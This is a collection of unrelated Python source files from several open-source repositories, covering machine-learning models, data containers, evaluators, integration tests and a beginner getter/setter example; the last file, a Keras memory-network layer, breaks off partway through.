reconstruction_model.py | JungahYang/Deep3DFaceReconstruction | 1,424 | 22261 | <gh_stars>1000+
import tensorflow as tf
import face_decoder
import networks
import losses
from utils import *
###############################################################################################
# model for single image face reconstruction
###############################################################################################
class Reconstruction_model():
# initialization
def __init__(self,opt):
self.Face3D = face_decoder.Face3D() #analytic 3D face object
self.opt = opt # training options
self.Optimizer = tf.train.AdamOptimizer(learning_rate = opt.lr) # optimizer
# load input data from queue
def set_input(self,input_iterator):
self.imgs,self.lm_labels,self.attention_masks = input_iterator.get_next()
# forward process of the model
def forward(self,is_train = True):
with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):
self.coeff = networks.R_Net(self.imgs,is_training=is_train)
self.Face3D.Reconstruction_Block(self.coeff,self.opt)
self.id_labels = networks.Perceptual_Net(self.imgs)
self.id_features = networks.Perceptual_Net(self.Face3D.render_imgs)
self.photo_loss = losses.Photo_loss(self.imgs,self.Face3D.render_imgs,self.Face3D.img_mask_crop*self.attention_masks)
self.landmark_loss = losses.Landmark_loss(self.Face3D.landmark_p,self.lm_labels)
self.perceptual_loss = losses.Perceptual_loss(self.id_features,self.id_labels)
self.reg_loss = losses.Regulation_loss(self.Face3D.id_coeff,self.Face3D.ex_coeff,self.Face3D.tex_coeff,self.opt)
self.reflect_loss = losses.Reflectance_loss(self.Face3D.face_texture,self.Face3D.facemodel)
self.gamma_loss = losses.Gamma_loss(self.Face3D.gamma)
self.loss = self.opt.w_photo*self.photo_loss + self.opt.w_lm*self.landmark_loss + self.opt.w_id*self.perceptual_loss\
+ self.opt.w_reg*self.reg_loss + self.opt.w_ref*self.reflect_loss + self.opt.w_gamma*self.gamma_loss
# backward process
def backward(self,is_train = True):
if is_train:
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
var_list = tf.trainable_variables()
update_var_list = [v for v in var_list if 'resnet_v1_50' in v.name or 'fc-' in v.name]
grads = tf.gradients(self.loss,update_var_list)
# get train_op with update_ops to ensure updating for bn parameters
with tf.control_dependencies(update_ops):
self.train_op = self.Optimizer.apply_gradients(zip(grads,update_var_list),global_step = self.opt.global_step)
# if not training stage, avoid updating variables
else:
pass
# forward and backward
def step(self, is_train = True):
with tf.variable_scope(tf.get_variable_scope()) as scope:
self.forward(is_train = is_train)
self.backward(is_train = is_train)
# statistics summarization
def summarize(self):
# scalar and histogram stats
stat = [
tf.summary.scalar('reflect_error',self.reflect_loss),
tf.summary.scalar('gamma_error',self.gamma_loss),
tf.summary.scalar('id_sim_error',self.perceptual_loss),
tf.summary.scalar('lm_error',tf.sqrt(self.landmark_loss)),
tf.summary.scalar('photo_error',self.photo_loss),
tf.summary.scalar('train_error',self.loss),
tf.summary.histogram('id_coeff',self.Face3D.id_coeff),
tf.summary.histogram('ex_coeff',self.Face3D.ex_coeff),
tf.summary.histogram('tex_coeff',self.Face3D.tex_coeff)]
self.summary_stat = tf.summary.merge(stat)
# combine face region of reconstruction images with input images
render_imgs = self.Face3D.render_imgs[:,:,:,::-1]*self.Face3D.img_mask + tf.cast(self.imgs[:,:,:,::-1],tf.float32)*(1-self.Face3D.img_mask)
render_imgs = tf.clip_by_value(render_imgs,0,255)
render_imgs = tf.cast(render_imgs,tf.uint8)
# image stats
img_stat = [tf.summary.image('imgs',tf.concat([tf.cast(self.imgs[:,:,:,::-1],tf.uint8),render_imgs],axis = 2), max_outputs = 8)]
self.summary_img = tf.summary.merge(img_stat) |
integration_tests/test_test_oracle_tax.py | weblucas/mseg-semantic | 391 | 22266 | <reponame>weblucas/mseg-semantic
#!/usr/bin/python3
from pathlib import Path
from types import SimpleNamespace
from mseg_semantic.scripts.collect_results import parse_result_file
from mseg_semantic.tool.test_oracle_tax import test_oracle_taxonomy_model
REPO_ROOT_ = Path(__file__).resolve().parent.parent
# Replace this variables with your own path to run integration tests.
INTEGRATION_TEST_OUTPUT_DIR = '/srv/scratch/jlambert30/MSeg/mseg-semantic/integration_test_data'
# Copy the mseg-3m-1080p model there
CAMVID_MODEL_PATH = f'{INTEGRATION_TEST_OUTPUT_DIR}/camvid-11-1m.pth'
def test_evaluate_oracle_tax_model():
"""
Ensure oracle model testing script works correctly.
    base_sizes=(
        #360
        720
        #1080
    )
    python -u mseg_semantic/tool/test_oracle_tax.py --config=${config_fpath}
dataset ${dataset_name} model_path ${model_fpath} model_name ${model_name}
"""
base_size = 1080
d = {
'dataset': 'camvid-11',
        'config': f'{REPO_ROOT_}/mseg_semantic/config/test/default_config_{base_size}_ss.yaml',
'model_path': CAMVID_MODEL_PATH,
'model_name': 'mseg-3m-1080p',
'input_file': 'default',
'base_size': base_size,
'test_h': 713,
'test_w': 713,
'scales': [1.0],
'save_folder': 'default',
'arch': 'hrnet',
'index_start': 0,
'index_step': 0,
'workers': 16,
'has_prediction': False,
'split': 'val',
'vis_freq': 20
}
args = SimpleNamespace(**d)
use_gpu = True
test_oracle_taxonomy_model(args, use_gpu)
# Ensure that results match paper
result_file_path = INTEGRATION_TEST_OUTPUT_DIR
result_file_path += f'/camvid-11-1m/camvid-11/{base_size}/ss/results.txt'
assert Path(result_file_path).exists()
mIoU = parse_result_file(result_file_path)
print(f"mIoU: {mIoU}")
# single-scale result
assert mIoU == 78.79
OKGREEN = '\033[92m'
ENDC = '\033[0m'
print(OKGREEN + ">>>>>>>>>>>>>>>>>>>>>>>>>>>>" + ENDC)
print(OKGREEN + 'Oracle model evalution passed successfully' + ENDC)
print(OKGREEN + ">>>>>>>>>>>>>>>>>>>>>>>>>>>>" + ENDC)
if __name__ == '__main__':
test_evaluate_oracle_tax_model()
|
docs/OOPS/Accessing_pvt_var2.py | munyumunyu/Python-for-beginners | 158 | 22270 | '''
To have an error-free way of accessing and updating private variables, we create specific methods for this.
Methods that are meant to set a value on a private variable are called setter methods, and methods
meant to access private variable values are called getter methods.
The code below is an example of getter and setter methods:
'''
class Customer:
def __init__(self, id, name, age, wallet_balance):
self.id = id
self.name = name
self.age = age
self.__wallet_balance = wallet_balance
def set_wallet_balance(self, amount):
        if amount < 1000 and amount > 0:
self.__wallet_balance = amount
def get_wallet_balance(self):
return self.__wallet_balance
c1=Customer(100, "Gopal", 24, 1000)
c1.set_wallet_balance(120)
print(c1.get_wallet_balance())
|
test-framework/test-suites/integration/tests/list/test_list_repo.py | sammeidinger/stack | 123 | 22272 | import json
class TestListRepo:
def test_invalid(self, host):
result = host.run('stack list repo test')
assert result.rc == 255
assert result.stderr.startswith('error - ')
def test_args(self, host, add_repo):
# Add a second repo so we can make sure it is skipped
add_repo('test2', 'test2url')
# Run list repo with just the test box
result = host.run('stack list repo test output-format=json')
assert result.rc == 0
# Make sure we got data only for the test box
repo_data = json.loads(result.stdout)
assert len(repo_data) == 1
assert repo_data[0]['name'] == 'test'
# now get all of them
# assert both repos are in the list data
result = host.run('stack list repo output-format=json')
repo_data = json.loads(result.stdout)
assert len(repo_data) == 2
assert {'test', 'test2'} == {repo['name'] for repo in repo_data}
# now get all of them, by explicitly asking for them
# assert both repos are in the list data
result = host.run('stack list repo test test2 output-format=json')
new_repo_data = json.loads(result.stdout)
assert len(new_repo_data) == 2
assert {'test', 'test2'} == {repo['name'] for repo in new_repo_data}
def test_removed_not_listed(self, host, add_repo, revert_etc):
# Run list repo with just the test box
result = host.run('stack list repo test output-format=json')
assert result.rc == 0
# Make sure we got data only for the test box
repo_data = json.loads(result.stdout)
assert len(repo_data) == 1
assert repo_data[0]['name'] == 'test'
result = host.run('stack remove repo test')
assert result.rc == 0
# Run list repo again
result = host.run('stack list repo test output-format=json')
assert result.rc == 255
assert result.stderr.startswith('error - ')
def test_expanded_columns(self, host, host_os, add_repo):
# Run list repo with just the test box
result = host.run('stack list repo test expanded=true output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
"name": "test",
"alias": "test",
"url": "test_url",
"autorefresh": False,
"assumeyes": False,
"type": "rpm-md",
"is_mirrorlist": False,
"gpgcheck": False,
"gpgkey": None,
"os": host_os,
"pallet name": None
}
]
def test_add_repo_with_pallet(self, host, host_os, add_repo, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks, revert_etc):
result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso')
#result = host.run(f'stack add pallet /root/minimal-1.0-sles12.x86_64.disk1.iso')
assert result.rc == 0
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
pallet_data = json.loads(result.stdout)
assert len(pallet_data) == 1
# get pallet id, as well as the -'d name in the correct order
from stack.commands import DatabaseConnection, get_mysql_connection, Command
from stack.argument_processors.pallet import PalletArgProcessor
from operator import attrgetter
p = PalletArgProcessor()
p.db = DatabaseConnection(get_mysql_connection())
minimal_pallet = p.get_pallets(args=['minimal'], params=pallet_data[0])[0]
pallet_name = '-'.join(attrgetter('name', 'version', 'rel', 'os', 'arch')(minimal_pallet))
# now attach the test repo to the pallet
result = host.run(f'stack set repo test pallet={minimal_pallet.id}')
assert result.rc == 0
# now verify it is attached to that pallet
result = host.run('stack list repo test expanded=true output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
"name": "test",
"alias": "test",
"url": "test_url",
"autorefresh": False,
"assumeyes": False,
"type": "rpm-md",
"is_mirrorlist": False,
"gpgcheck": False,
"gpgkey": None,
"os": host_os,
"pallet name": pallet_name
}
]
# now verify that removing that pallet removes the repo as well
result = host.run('stack remove pallet minimal')
assert result.rc == 0
result = host.run('stack list repo')
assert result.rc == 0
assert result.stdout == ''
|
src/ralph/api/__init__.py | DoNnMyTh/ralph | 1,668 | 22300 | from ralph.api.serializers import RalphAPISerializer
from ralph.api.viewsets import RalphAPIViewSet, RalphReadOnlyAPIViewSet
from ralph.api.routers import router
__all__ = [
'RalphAPISerializer',
'RalphAPIViewSet',
'RalphReadOnlyAPIViewSet',
'router',
]
|
bnpy/data/GroupXData.py | raphael-group/bnpy | 184 | 22307 | <reponame>raphael-group/bnpy<filename>bnpy/data/GroupXData.py
'''
Classes
-----
GroupXData
Data object for holding a dense matrix X of real 64-bit floats,
organized contiguously based on provided group structure.
'''
import numpy as np
from collections import namedtuple
from bnpy.data.XData import XData
from bnpy.util import as1D, as2D, as3D, toCArray
from bnpy.util import numpyToSharedMemArray, sharedMemToNumpyArray
class GroupXData(XData):
""" Dataset object for dense real vectors organized in groups.
GroupXData can represent situations like:
* obseved image patches, across many images
group=image, observation=patch
* observed test results for patients, across many hospitals
group=hospital, obsevation=patient test result
Attributes
------
X : 2D array, size N x D
each row is a single dense observation vector
Xprev : 2D array, size N x D, optional
"previous" observations for auto-regressive likelihoods
dim : int
the dimension of each observation
nObs : int
the number of in-memory observations for this instance
TrueParams : dict
key/value pairs represent names and arrays of true parameters
doc_range : 1D array, size nDoc+1
the number of in-memory observations for this instance
nDoc : int
the number of in-memory documents for this instance
nDocTotal : int
total number of documents in entire dataset
Example
--------
# Create 1000 observations, each one a 3D vector
>>> X = np.random.randn(1000, 3)
# Assign items 0-499 to doc 1, 500-1000 to doc 2
>>> doc_range = [0, 500, 1000]
>>> myData = GroupXData(X, doc_range)
>>> print (myData.nObs)
1000
>>> print (myData.X.shape)
(1000, 3)
>>> print (myData.nDoc)
2
"""
@classmethod
def LoadFromFile(cls, filepath, nDocTotal=None, **kwargs):
''' Constructor for loading data from disk into XData instance
'''
if filepath.endswith('.mat'):
return cls.read_mat(filepath, nDocTotal=nDocTotal, **kwargs)
raise NotImplemented('Only .mat file supported.')
def save_to_mat(self, matfilepath):
''' Save contents of current object to disk
'''
import scipy.io
SaveVars = dict(X=self.X, nDoc=self.nDoc, doc_range=self.doc_range)
if hasattr(self, 'Xprev'):
SaveVars['Xprev'] = self.Xprev
if hasattr(self, 'TrueParams') and 'Z' in self.TrueParams:
SaveVars['TrueZ'] = self.TrueParams['Z']
scipy.io.savemat(matfilepath, SaveVars, oned_as='row')
@classmethod
def read_npz(cls, npzfilepath, nDocTotal=None, **kwargs):
''' Constructor for building an instance of GroupXData from npz
'''
var_dict = dict(**np.load(npzfilepath, allow_pickle=True))
if 'X' not in var_dict:
raise KeyError(
'Stored npz file needs to have data in field named X')
if 'doc_range' not in var_dict:
raise KeyError(
'Stored npz file needs to have field named doc_range')
if nDocTotal is not None:
var_dict['nDocTotal'] = nDocTotal
return cls(**var_dict)
@classmethod
def read_mat(cls, matfilepath, nDocTotal=None, **kwargs):
''' Constructor for building an instance of GroupXData from disk
'''
import scipy.io
InDict = scipy.io.loadmat(matfilepath)
if 'X' not in InDict:
raise KeyError(
'Stored matfile needs to have data in field named X')
if 'doc_range' not in InDict:
raise KeyError(
'Stored matfile needs to have field named doc_range')
if nDocTotal is not None:
InDict['nDocTotal'] = nDocTotal
return cls(**InDict)
def __init__(self, X=None, doc_range=None, nDocTotal=None,
Xprev=None, TrueZ=None,
TrueParams=None, fileNames=None, summary=None, **kwargs):
''' Create an instance of GroupXData for provided array X
Post Condition
---------
self.X : 2D array, size N x D
with standardized dtype, alignment, byteorder.
self.Xprev : 2D array, size N x D
with standardized dtype, alignment, byteorder.
self.doc_range : 1D array, size nDoc+1
'''
self.X = as2D(toCArray(X, dtype=np.float64))
self.doc_range = as1D(toCArray(doc_range, dtype=np.int32))
if summary is not None:
self.summary = summary
if Xprev is not None:
self.Xprev = as2D(toCArray(Xprev, dtype=np.float64))
# Verify attributes are consistent
self._set_dependent_params(doc_range, nDocTotal)
self._check_dims()
# Add optional true parameters / true hard labels
if TrueParams is not None:
self.TrueParams = dict()
for key, arr in list(TrueParams.items()):
self.TrueParams[key] = toCArray(arr)
if TrueZ is not None:
if not hasattr(self, 'TrueParams'):
self.TrueParams = dict()
self.TrueParams['Z'] = as1D(toCArray(TrueZ))
self.TrueParams['K'] = np.unique(self.TrueParams['Z']).size
# Add optional source files for each group/sequence
if fileNames is not None:
if hasattr(fileNames, 'shape') and fileNames.shape == (1, 1):
fileNames = fileNames[0, 0]
if len(fileNames) > 1:
self.fileNames = [str(x).strip()
for x in np.squeeze(fileNames)]
else:
self.fileNames = [str(fileNames[0])]
# Add extra data attributes custom for the dataset
for key in kwargs:
if hasattr(self, key):
continue
if not key.startswith("__"):
arr = np.squeeze(as1D(kwargs[key]))
if arr.shape == ():
try:
arr = float(arr)
except TypeError:
continue
setattr(self, key, arr)
def _set_dependent_params(self, doc_range, nDocTotal=None):
self.nObs = self.X.shape[0]
self.dim = self.X.shape[1]
self.nDoc = self.doc_range.size - 1
if nDocTotal is None:
self.nDocTotal = self.nDoc
else:
self.nDocTotal = int(nDocTotal)
def _check_dims(self):
assert self.X.ndim == 2
assert self.X.flags.c_contiguous
assert self.X.flags.owndata
assert self.X.flags.aligned
assert self.X.flags.writeable
assert self.doc_range.ndim == 1
assert self.doc_range.size == self.nDoc + 1
assert self.doc_range[0] == 0
assert self.doc_range[-1] == self.nObs
assert np.all(self.doc_range[1:] - self.doc_range[:-1] >= 0)
def get_size(self):
return self.nDoc
def get_total_size(self):
return self.nDocTotal
def get_dim(self):
return self.dim
def get_text_summary(self):
''' Returns human-readable description of this dataset
'''
if hasattr(self, 'summary'):
s = self.summary
else:
s = 'GroupXData'
return s
def get_stats_summary(self):
''' Returns human-readable summary of this dataset's basic properties
'''
s = ' size: %d units (documents)\n' % (self.get_size())
s += ' dimension: %d' % (self.get_dim())
return s
def toXData(self):
''' Return simplified XData instance, losing group structure
'''
if hasattr(self, 'TrueParams'):
TParams = self.TrueParams
else:
TParams=None
if hasattr(self, 'Xprev'):
return XData(self.X, Xprev=self.Xprev, TrueParams=TParams)
else:
return XData(self.X, TrueParams=TParams)
# Create Subset
#########################################################
def make_subset(self,
docMask=None,
atomMask=None,
doTrackTruth=False,
doTrackFullSize=True):
""" Get subset of this dataset identified by provided unit IDs.
Parameters
-------
docMask : 1D array_like of ints
Identifies units (documents) to use to build subset.
doTrackFullSize : boolean, optional
default=True
If True, return DataObj with same nDocTotal value as this
dataset. If False, returned DataObj has smaller size.
atomMask : 1D array_like of ints, optional
default=None
If present, identifies rows of X to return as XData
Returns
-------
Dchunk : bnpy.data.GroupXData instance
"""
if atomMask is not None:
return self.toXData().select_subset_by_mask(atomMask)
if len(docMask) < 1:
raise ValueError('Cannot select empty subset')
newXList = list()
newXPrevList = list()
newDocRange = np.zeros(len(docMask) + 1)
newPos = 1
for d in range(len(docMask)):
start = self.doc_range[docMask[d]]
stop = self.doc_range[docMask[d] + 1]
newXList.append(self.X[start:stop])
if hasattr(self, 'Xprev'):
newXPrevList.append(self.Xprev[start:stop])
newDocRange[newPos] = newDocRange[newPos - 1] + stop - start
newPos += 1
newX = np.vstack(newXList)
if hasattr(self, 'Xprev'):
newXprev = np.vstack(newXPrevList)
else:
newXprev = None
if doTrackFullSize:
nDocTotal = self.nDocTotal
else:
nDocTotal = None
if hasattr(self, 'alwaysTrackTruth'):
doTrackTruth = doTrackTruth or self.alwaysTrackTruth
hasTrueZ = hasattr(self, 'TrueParams') and 'Z' in self.TrueParams
if doTrackTruth and hasTrueZ:
TrueZ = self.TrueParams['Z']
newTrueZList = list()
for d in range(len(docMask)):
start = self.doc_range[docMask[d]]
stop = self.doc_range[docMask[d] + 1]
newTrueZList.append(TrueZ[start:stop])
newTrueZ = np.hstack(newTrueZList)
assert newTrueZ.size == newDocRange[-1]
else:
newTrueZ = None
return GroupXData(newX, newDocRange,
Xprev=newXprev,
nDocTotal=nDocTotal,
TrueZ=newTrueZ)
def add_data(self, XDataObj):
""" Appends (in-place) provided dataset to this dataset.
Post Condition
-------
self.Data grows by adding all units from provided DataObj.
"""
if not self.dim == XDataObj.dim:
raise ValueError("Dimensions must match!")
self.nObs += XDataObj.nObs
self.nDocTotal += XDataObj.nDocTotal
self.nDoc += XDataObj.nDoc
self.X = np.vstack([self.X, XDataObj.X])
if hasattr(self, 'Xprev'):
self.Xprev = np.vstack([self.Xprev, XDataObj.Xprev])
new_doc_range = XDataObj.doc_range[1:] + self.doc_range[-1]
self.doc_range = np.hstack([self.doc_range, new_doc_range])
self._check_dims()
def get_random_sample(self, nDoc, randstate=np.random):
nDoc = np.minimum(nDoc, self.nDoc)
mask = randstate.permutation(self.nDoc)[:nDoc]
Data = self.select_subset_by_mask(mask, doTrackFullSize=False)
return Data
def __str__(self):
return self.X.__str__()
def getRawDataAsSharedMemDict(self):
''' Create dict with copies of raw data as shared memory arrays
'''
dataShMemDict = dict()
dataShMemDict['X'] = numpyToSharedMemArray(self.X)
dataShMemDict['doc_range'] = numpyToSharedMemArray(self.doc_range)
dataShMemDict['nDocTotal'] = self.nDocTotal
if hasattr(self, 'Xprev'):
dataShMemDict['Xprev'] = numpyToSharedMemArray(self.Xprev)
return dataShMemDict
def getDataSliceFunctionHandle(self):
""" Return function handle that can make data slice objects.
Useful with parallelized algorithms,
when we need to use shared memory.
Returns
-------
f : function handle
"""
return makeDataSliceFromSharedMem
def makeDataSliceFromSharedMem(dataShMemDict,
cslice=(0, None),
batchID=None):
""" Create data slice from provided raw arrays and slice indicators.
Returns
-------
Dslice : namedtuple with same fields as GroupXData object
* X
* nObs
* nObsTotal
* dim
Represents subset of documents identified by cslice tuple.
Example
-------
>>> Data = GroupXData(np.random.rand(25,2), doc_range=[0,4,12,25])
>>> shMemDict = Data.getRawDataAsSharedMemDict()
>>> Dslice = makeDataSliceFromSharedMem(shMemDict)
>>> np.allclose(Data.X, Dslice.X)
True
>>> np.allclose(Data.nObs, Dslice.nObs)
True
>>> Data.dim == Dslice.dim
True
>>> Aslice = makeDataSliceFromSharedMem(shMemDict, (0, 2))
>>> Aslice.nDoc
2
>>> np.allclose(Aslice.doc_range, Dslice.doc_range[0:(2+1)])
True
"""
if batchID is not None and batchID in dataShMemDict:
dataShMemDict = dataShMemDict[batchID]
# Make local views (NOT copies) to shared mem arrays
doc_range = sharedMemToNumpyArray(dataShMemDict['doc_range'])
X = sharedMemToNumpyArray(dataShMemDict['X'])
nDocTotal = int(dataShMemDict['nDocTotal'])
dim = X.shape[1]
if cslice is None:
cslice = (0, doc_range.size - 1)
elif cslice[1] is None:
cslice = (0, doc_range.size - 1)
tstart = doc_range[cslice[0]]
tstop = doc_range[cslice[1]]
keys = ['X', 'Xprev', 'doc_range', 'nDoc', 'nObs', 'dim', 'nDocTotal']
if 'Xprev' in dataShMemDict:
Xprev = sharedMemToNumpyArray(dataShMemDict['Xprev'])[tstart:tstop]
else:
Xprev = None
Dslice = namedtuple("GroupXDataTuple", keys)(
X=X[tstart:tstop],
Xprev=Xprev,
doc_range=doc_range[cslice[0]:cslice[1] + 1] - doc_range[cslice[0]],
nDoc=cslice[1] - cslice[0],
nObs=tstop - tstart,
dim=dim,
nDocTotal=nDocTotal,
)
return Dslice
|
numba/cuda/simulator/cudadrv/error.py | auderson/numba | 6,620 | 22333 | class CudaSupportError(RuntimeError):
pass
|
BiBloSA/exp_SICK/src/evaluator.py | mikimaus78/ml_monorepo | 116 | 22344 | from configs import cfg
from src.utils.record_log import _logger
import numpy as np
import tensorflow as tf
import scipy.stats as stats
class Evaluator(object):
def __init__(self, model):
self.model = model
self.global_step = model.global_step
## ---- summary----
self.build_summary()
self.writer = tf.summary.FileWriter(cfg.summary_dir)
def get_evaluation(self, sess, dataset_obj, global_step=None):
_logger.add()
_logger.add('getting evaluation result for %s' % dataset_obj.data_type)
logits_list, loss_list = [], []
target_score_list, predicted_score_list = [], []
for sample_batch, _, _, _ in dataset_obj.generate_batch_sample_iter():
feed_dict = self.model.get_feed_dict(sample_batch, 'dev')
logits, loss, predicted_score = sess.run([self.model.logits, self.model.loss,
self.model.predicted_score], feed_dict)
logits_list.append(np.argmax(logits, -1))
loss_list.append(loss)
predicted_score_list.append(predicted_score)
for sample in sample_batch:
target_score_list.append(sample['relatedness_score'])
logits_array = np.concatenate(logits_list, 0)
loss_value = np.mean(loss_list)
target_scores = np.array(target_score_list)
predicted_scores = np.concatenate(predicted_score_list, 0)
# pearson, spearman, mse
pearson_value = stats.pearsonr(target_scores, predicted_scores)[0]
spearman_value = stats.spearmanr(target_scores, predicted_scores)[0]
mse_value = np.mean((target_scores - predicted_scores) ** 2)
# todo: analysis
# analysis_save_dir = cfg.mkdir(cfg.answer_dir, 'gs_%d' % global_step or 0)
# OutputAnalysis.do_analysis(dataset_obj, logits_array, accu_array, analysis_save_dir,
# cfg.fine_grained)
if global_step is not None:
if dataset_obj.data_type == 'train':
summary_feed_dict = {
self.train_loss: loss_value,
self.train_pearson: pearson_value,
self.train_spearman: spearman_value,
self.train_mse: mse_value,
}
summary = sess.run(self.train_summaries, summary_feed_dict)
self.writer.add_summary(summary, global_step)
elif dataset_obj.data_type == 'dev':
summary_feed_dict = {
self.dev_loss: loss_value,
self.dev_pearson: pearson_value,
self.dev_spearman: spearman_value,
self.dev_mse: mse_value,
}
summary = sess.run(self.dev_summaries, summary_feed_dict)
self.writer.add_summary(summary, global_step)
else:
summary_feed_dict = {
self.test_loss: loss_value,
self.test_pearson: pearson_value,
self.test_spearman: spearman_value,
self.test_mse: mse_value,
}
summary = sess.run(self.test_summaries, summary_feed_dict)
self.writer.add_summary(summary, global_step)
return loss_value, (pearson_value, spearman_value, mse_value)
# --- internal use ------
def build_summary(self):
with tf.name_scope('train_summaries'):
self.train_loss = tf.placeholder(tf.float32, [], 'train_loss')
self.train_pearson = tf.placeholder(tf.float32, [], 'train_pearson')
self.train_spearman = tf.placeholder(tf.float32, [], 'train_spearman')
self.train_mse = tf.placeholder(tf.float32, [], 'train_mse')
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_loss', self.train_loss))
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_pearson', self.train_pearson))
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_spearman', self.train_spearman))
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_mse', self.train_mse))
self.train_summaries = tf.summary.merge_all('train_summaries_collection')
with tf.name_scope('dev_summaries'):
self.dev_loss = tf.placeholder(tf.float32, [], 'dev_loss')
self.dev_pearson = tf.placeholder(tf.float32, [], 'dev_pearson')
self.dev_spearman = tf.placeholder(tf.float32, [], 'dev_spearman')
self.dev_mse = tf.placeholder(tf.float32, [], 'dev_mse')
tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_loss',self.dev_loss))
tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_pearson', self.dev_pearson))
tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_spearman', self.dev_spearman))
tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_mse', self.dev_mse))
self.dev_summaries = tf.summary.merge_all('dev_summaries_collection')
with tf.name_scope('test_summaries'):
self.test_loss = tf.placeholder(tf.float32, [], 'test_loss')
self.test_pearson = tf.placeholder(tf.float32, [], 'test_pearson')
self.test_spearman = tf.placeholder(tf.float32, [], 'test_spearman')
self.test_mse = tf.placeholder(tf.float32, [], 'test_mse')
tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_loss',self.test_loss))
tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_pearson', self.test_pearson))
tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_spearman', self.test_spearman))
tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_mse', self.test_mse))
self.test_summaries = tf.summary.merge_all('test_summaries_collection')
|
pytorch_translate/tasks/translation_from_pretrained_xlm.py | dzhulgakov/translate | 748 | 22345 | <gh_stars>100-1000
#!/usr/bin/env python3
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
from fairseq import options, tokenizer
from fairseq.tasks import register_task
from pytorch_translate import constants
from pytorch_translate.data.masked_lm_dictionary import MaskedLMDictionary
from pytorch_translate.tasks.pytorch_translate_task import PytorchTranslateTask
@register_task("pytorch_translate_translation_from_pretrained_xlm")
class PytorchTranslateTranslationFromPretrainedXLMTask(PytorchTranslateTask):
"""
Same as TranslationTask except use the MaskedLMDictionary class so that
we can load data that was binarized with the MaskedLMDictionary class.
This task should be used for the entire training pipeline when we want to
train an NMT model from a pretrained XLM checkpoint: binarizing NMT data,
training NMT with the pretrained XLM checkpoint, and subsequent evaluation
of that trained model.
"""
@staticmethod
def add_args(parser):
PytorchTranslateTask.add_args(parser)
"""Add task-specific arguments to the parser."""
parser.add_argument(
"--save-only", action="store_true", help="skip eval and only do save"
)
@classmethod
def load_dictionary(cls, filename):
"""Load the masked LM dictionary from the filename
Args:
filename (str): the filename
"""
return MaskedLMDictionary.load(filename)
@classmethod
def build_dictionary(
cls, filenames, workers=1, threshold=-1, nwords=-1, padding_factor=8
):
"""Build the dictionary
Args:
filenames (list): list of filenames
workers (int): number of concurrent workers
threshold (int): defines the minimum word count
nwords (int): defines the total number of words in the final dictionary,
including special symbols
padding_factor (int): can be used to pad the dictionary size to be a
multiple of 8, which is important on some hardware (e.g., Nvidia
Tensor Cores).
"""
d = MaskedLMDictionary()
for filename in filenames:
MaskedLMDictionary.add_file_to_dictionary(
filename, d, tokenizer.tokenize_line, workers
)
d.finalize(threshold=threshold, nwords=nwords, padding_factor=padding_factor)
return d
@classmethod
def setup_task(cls, args, **kwargs):
args.left_pad_source = options.eval_bool(args.left_pad_source)
# Load dictionaries
source_dict = MaskedLMDictionary.load(args.source_vocab_file)
target_dict = MaskedLMDictionary.load(args.target_vocab_file)
source_lang = args.source_lang or "src"
target_lang = args.target_lang or "tgt"
print(f"| [{source_lang}] dictionary: {len(source_dict)} types")
print(f"| [{target_lang}] dictionary: {len(target_dict)} types")
use_char_source = (args.char_source_vocab_file != "") or (
getattr(args, "arch", "") in constants.ARCHS_FOR_CHAR_SOURCE
)
if use_char_source:
char_source_dict = MaskedLMDictionary.load(args.char_source_vocab_file)
# this attribute is used for CharSourceModel construction
args.char_source_dict_size = len(char_source_dict)
else:
char_source_dict = None
return cls(args, source_dict, target_dict, char_source_dict)
|
drugresnet/seya/layers/memnn2.py | Naghipourfar/CCLE | 429 | 22346 | <gh_stars>100-1000
import theano.tensor as T
import keras.backend as K
from keras.layers.core import LambdaMerge
from keras import initializations
class MemN2N(LambdaMerge):
def __init__(self, layers, output_dim, input_dim, input_length,
memory_length, hops=3, bow_mode="bow", mode="adjacent",
emb_init="uniform", init="glorot_uniform", **kwargs):
self.output_dim = output_dim
self.input_dim = input_dim
self.input_length = input_length
self.memory_length = memory_length
self.hops = hops
self.bow_mode = bow_mode
self.mode = mode
self.init = initializations.get(init)
self.emb_init = initializations.get(emb_init)
output_shape = (self.output_dim, )
super(MemN2N, self).__init__(layers, lambda x: x, output_shape)
def build(self):
# list of embedding layers
self.outputs = []
self.memory = []
# self.Hs = [] # if self.mode == "rnn"
self.trainable_weights = []
for i in range(self.hops):
# memory embedding - A
if self.mode == "adjacent" and i > 0:
A = self.outputs[-1]
else:
A = self.emb_init((self.input_dim, self.output_dim),
name="{}_A_{}".format(self.name, i))
self.trainable_weights += [A]
self.memory.append(A)
# outputs embedding - C
# if self.mode == "adjacent" and i > 1:
# Wo = self.outputs[-1]
# elif self.mode == "untied" or i == 0:
C = self.emb_init((self.input_dim, self.output_dim),
name="{}_C_{}".format(self.name, i))
self.trainable_weights += [C]
self.outputs.append(C)
# if self.mode == "rnn"
# H = self.init((self.output_dim, self.output_dim),
# name="{}_H_{}".format(self.name, i))
# self.trainable_weights += [H]
# b = K.zeros((self.input_dim,),
# name="{}_b_{}".format(self.name, i))
# self.Hs += [H]
# self.trainable_weights += [H]
if self.mode == "adjacent":
self.W = self.outputs[-1].T
self.b = K.zeros((self.input_dim,), name="{}_b".format(self.name))
# self.trainable_weights += [self.b]
# question embedding - B
self.B = self.emb_init((self.input_dim, self.output_dim),
name="{}_B".format(self.name))
